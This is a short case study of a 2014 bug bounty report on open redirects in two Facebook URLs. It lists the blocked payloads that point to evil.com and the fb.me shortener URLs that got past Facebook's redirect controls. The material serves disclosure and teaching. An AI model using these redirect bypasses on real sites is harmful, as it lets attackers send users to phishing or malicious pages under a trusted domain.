On November 13th, 2014, a bug bounty hunter, called Yassine Aboukir, reported an open redirect vulnerability directly to the Facebook security team. He found two URLs vulnerable to redirections:
https://www.facebook.com/ads/manage/log/?uri=xxxxx&event=view_power_editor&ad_account_id=1 https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=xxxxx
As he mentioned in the report, he tried common techniques to exploit the vulnerabilities, but it was not possible due to the controls implemented by Facebook:
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www.evil.com/ https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=../evil.com https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=http://evil.com
So, he used a shortener; one of the techniques we reviewed before, to bypass Facebook's controls:
https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://fb.me/7kFH9QAMH https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=https://l.facebook.com/l.php?u=http:// fb.me/7kFH9QAMH https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://d.fb.me/7kFH9QAMH https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://d.fb.me/7kFH9QAMH https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www.fb.me/7kFH9QAMH https://www.facebook.com/browsegroups/addcover/log/?groupid=1&groupuri=http://www..fb.me/7kFH9QAMH
If you want to learn more about this bug, check the researcher's blog: https://yassineaboukir.com/blog/how-i-discovered-a-1000-open-redirect-in-facebook/.